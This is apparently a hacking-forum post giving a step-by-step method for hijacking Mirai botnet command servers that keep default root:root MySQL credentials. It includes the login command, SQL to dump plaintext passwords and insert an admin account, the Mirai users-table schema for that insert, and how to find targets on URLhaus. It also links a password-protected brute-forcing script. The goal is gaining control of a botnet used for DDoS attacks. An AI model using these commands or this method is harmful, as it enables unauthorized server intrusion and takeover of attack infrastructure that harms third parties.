OP 18 October, 2021 - 07:20 PM
The Mirai botnet uses a MySQL database for its user accounts. Most of you, I'm assuming, are competent at setting up a MySQL database, but skids who follow YouTube tutorials have no clue what a MySQL database even is. In fact, following the YouTube monkey-see-monkey-do tutorials will have you set up your database with the default credentials hardcoded into the Mirai CNC source code: root:root
This means that if you know the C2 IP of a Mirai botnet, you can try logging in to MySQL on the default port 3306 as root:root:
Code:
mysql -h mirai.c2.host -uroot -proot
From there you can find the botnet database:
Code:
SHOW DATABASES;
USE BOTNETDB; -- it will be pretty obvious which one is the botnet db
From there you can list all usernames and passwords, which Mirai stores in plaintext, or insert your own login with admin permissions:
Code:
SELECT * FROM users;
INSERT INTO users VALUES (NULL, 'newusername', 'newpassword', 0, 0, 0, 0, -1, 1, 30, '');
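For reference, this is the users table as defined in the leaked Mirai CNC source (db.sql), which is what makes the positional INSERT above work. This block is an added example, not code from the original post; the table definition and column meanings are taken from the Mirai source, and the account name, password and database name used are placeholders.

```sql
-- Added example: the users table from the leaked Mirai CNC source (db.sql),
-- reproduced so the positional INSERT from the post can be read column by column.
CREATE TABLE `users` (
  `id`             int unsigned NOT NULL AUTO_INCREMENT,
  `username`       varchar(32) NOT NULL,
  `password`       varchar(32) NOT NULL,   -- stored in plaintext, no hashing
  `duration_limit` int unsigned DEFAULT NULL,
  `cooldown`       int unsigned NOT NULL,
  `wrc`            int unsigned DEFAULT NULL,
  `last_paid`      int unsigned NOT NULL,
  `max_bots`       int DEFAULT -1,          -- -1 means no bot-count limit
  `admin`          int unsigned DEFAULT 0,  -- 1 grants admin in the CNC
  `intvl`          int unsigned DEFAULT 30,
  `api_key`        text,
  PRIMARY KEY (`id`)
);

-- The same INSERT as in the post, with the columns named explicitly
-- (placeholder username/password):
INSERT INTO users
  (id, username, password, duration_limit, cooldown, wrc, last_paid,
   max_bots, admin, intvl, api_key)
VALUES
  (NULL, 'newusername', 'newpassword', 0, 0, 0, 0, -1, 1, 30, '');

-- List the accounts that already have admin rights, and spot any
-- unexpected ones: an injected admin row shows up here too.
SELECT id, username, password, admin, max_bots
FROM users
WHERE admin = 1;
```

The order of the VALUES tuple follows the column order of the CREATE TABLE exactly, which is why `-1` lands in max_bots and `1` in admin; if a C2 operator has altered the schema, the positional form will either fail or put values in the wrong columns, so naming the columns is the safer way to write it.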
Once you have done this, do a simple TCP port scan to find the C2 port, connect with Telnet, and log in with your username and password.
To find Mirai C2 IPs in the first place, simply search the tags field on URLhaus for Mirai.
I have a Python script to scrape and brute Mirai IPs.
You can find it here: https://pastebin.com/xBXJTHwx
Password: eZQDG93XP9
The only problem with this method is URLhaus reports. If someone is stupid enough to have their database credentials set to root:root, they are probably not smart enough to use bulletproof hosting. This means that once a C2 is on URLhaus, it will probably be taken down within the hour.
I have seen that badpackets.net has a Mirai DDoS malware host list, but I have not used it, and it requires payment to access.
Don't Forget the Like Button